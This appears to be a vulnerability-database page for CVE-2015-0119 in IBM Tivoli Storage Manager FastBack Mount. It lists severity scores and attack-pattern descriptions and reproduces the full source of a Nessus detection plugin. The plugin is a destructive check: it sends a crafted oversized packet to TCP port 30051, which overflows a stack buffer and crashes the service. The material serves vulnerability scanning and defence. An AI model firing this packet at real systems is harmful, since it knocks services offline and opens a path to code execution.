Vulnerabilities > CVE-2015-0119 - Improper Access Control vulnerability in IBM Tivoli Storage Manager Fastback

047910
CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
ibm
CWE-284
nessus
NVD
Published: 2015-04-06
Updated: 2015-04-06

Summary

FastBack Mount in IBM Tivoli Storage Manager FastBack 6.1.x before 6.1.11.1 allows remote attackers to execute arbitrary code by connecting to the Mount port.

Vulnerable Configurations

Part Description Count
Application
Ibm
47

Common Weakness Enumeration (CWE)

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Embedding Scripts within Scripts
    An attack of this type exploits a programs' vulnerabilities that are brought on by allowing remote hosts to execute scripts. The attacker leverages this capability to execute scripts to execute his/her own script by embedding it within other scripts that the target software is likely to execute. The attacker must have the ability to inject script into script that is likely to be executed. If this is done, then the attacker can potentially launch a variety of probes and attacks against the web server's local environment, in many cases the so-called DMZ, back end resources the web server can communicate with, and other hosts. With the proliferation of intermediaries, such as Web App Firewalls, network devices, and even printers having JVMs and Web servers, there are many locales where an attacker can inject malicious scripts. Since this attack pattern defines scripts within scripts, there are likely privileges to execute said attack on the host. Of course, these attacks are not solely limited to the server side, client side scripts like Ajax and client side JavaScript can contain malicious scripts as well. In general all that is required is for there to be sufficient privileges to execute a script, but not protected against writing.
  • Signature Spoofing by Key Theft
    An attacker obtains an authoritative or reputable signer's private signature key by theft and then uses this key to forge signatures from the original signer to mislead a victim into performing actions that benefit the attacker.

Nessus

NASL familyGeneral
NASL idIBM_TSM_FASTBACK_MOUNT_GETVAULTDUMP_STACK_OVERFLOW.NASL
descriptionThe IBM Tivoli Storage Manager (TSM) FastBack Mount application running on the remote host is affected by a remote code execution vulnerability in the FastBackServer.exe service due to improper validation of user-supplied input to the CMountDismount::GetVaultDump method. An unauthenticated, remote attacker can exploit this, by sending a crafted packet to TCP port 30051, to cause a stack-based buffer overflow, resulting in a denial of service condition or the execution of arbitrary code. Note that the FastBack Mount application running on the remote host is reportedly affected by other vulnerabilities as well; however, Nessus has not tested for them.
last seen2020-06-01
modified2020-06-02
plugin id96143
published2016-12-27
reporterThis script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
sourcehttps://www.tenable.com/plugins/nessus/96143
titleIBM Tivoli Storage Manager FastBack Mount CMountDismount::GetVaultDump RCE
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(96143);
  script_version("1.6");
  script_cvs_date("Date: 2019/11/13");

  script_cve_id("CVE-2015-0119");
  script_bugtraq_id(73917);
  script_xref(name:"ZDI", value:"ZDI-15-118");

  script_name(english:"IBM Tivoli Storage Manager FastBack Mount CMountDismount::GetVaultDump RCE");
  script_summary(english:"Attempts to terminate the FastBackMount process.");

  script_set_attribute(attribute:"synopsis", value:
"A virtual mount application running on the remote host is affected by
a remote code execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The IBM Tivoli Storage Manager (TSM) FastBack Mount application
running on the remote host is affected by a remote code execution
vulnerability in the FastBackServer.exe service due to improper
validation of user-supplied input to the CMountDismount::GetVaultDump
method. An unauthenticated, remote attacker can exploit this, by
sending a crafted packet to TCP port 30051, to cause a stack-based
buffer overflow, resulting in a denial of service condition or the
execution of arbitrary code.

Note that the FastBack Mount application running on the remote host is
reportedly affected by other vulnerabilities as well; however, Nessus
has not tested for them.");
  script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-15-118/");
  # http://www-01.ibm.com/support/docview.wss?uid=swg21699645
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?af253f07");
  script_set_attribute(attribute:"solution", value:
"Upgrade to IBM Tivoli Storage Manager FastBack version 6.1.11.1 or
later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2015-0119");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2015/04/01");
  script_set_attribute(attribute:"patch_publication_date", value:"2015/04/01");
  script_set_attribute(attribute:"plugin_publication_date", value:"2016/12/27");

  script_set_attribute(attribute:"potential_vulnerability", value:"true");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:ibm:tivoli_storage_manager_fastback");
  script_end_attributes();

  script_category(ACT_DESTRUCTIVE_ATTACK);
  script_family(english:"General");

  script_copyright(english:"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("ibm_tsm_fastback_mount_detect.nbin");
  script_require_keys("Services/tsm-fastback-mount", "Settings/ParanoidReport");

  exit(0);
}

include("byte_func.inc");
include("misc_func.inc");
include("global_settings.inc");
include("audit.inc");
include("dump.inc");

function mk_pkt(type, data)
{
  local_var hdr;

  if(isnull(type))
    type = 1;

  hdr = '\xAA\xBB\xAA\xBB' +          # magic 
      mkdword(strlen(data) + 0x10) +  # pkt length
      mkdword(0xBBBBBBBB) +           # ???
      mkdword(type);                  # pkt type

  return (hdr + data);
}

# Use lack of response to flag vulnerability is not so reliable
if (report_paranoia < 2) audit(AUDIT_PARANOID);

port = get_service(svc:'tsm-fastback-mount', default:30051, exit_on_fail:TRUE);
soc = open_sock_tcp(port);
if (!soc) 
  audit(AUDIT_SOCK_FAIL, port);

target = 'ip=port=user=pass=safe=';
target += crap(data:'A', length: 0x200 - strlen(target));

body = 
  mkdword(9)                      # opcode for S2M_MOUNT_Dump
  + crap(data:'\x00', length: 8)  # pos: 0; ???
  + '\x00'                        # pos: 8; reparse target
  + crap(data:'\x00', length: 4)  # pos: 9; ???
  + target                        # pos: 0xd; target; fixed size: 0x200 bytes   
  + mkdword(0)                    # pos: 0x20d; type; valid: 0-3
  + mkdword(2)                    # pos: 0x211; for 
  + mkdword(3)                    # pos: 0x215; full
  + mkdword(4);                   # pos: 0x219; OS type 

req = mk_pkt(data:body);
send(socket:soc, data:req);
recv(socket:soc, length:4096); # do not close the socket too soon
close(soc);

# FastBackMount.exe should terminates and restarts
# Send S2M_Mount_Info_request to check
soc = open_sock_tcp(port);
if (soc) 
{
  body = mkdword(7) + crap(data:'A', length:8);                     
  req2 = mk_pkt(data:body);
  send(socket:soc, data:req2);
  res = recv(socket:soc, length: 4096);
  close(soc);
  if (res)
  {
    audit(AUDIT_LISTEN_NOT_VULN,'IBM Tivoli Storage Manager FastBack Mount', port);
  }
}
# Vulnerable: failed to connect or receive a Mount_Info_response 
security_report_v4(
  port        : port,
  severity    : SECURITY_HOLE,
  generic     : TRUE,
  request     : make_list(hexdump(ddata:req))
);

References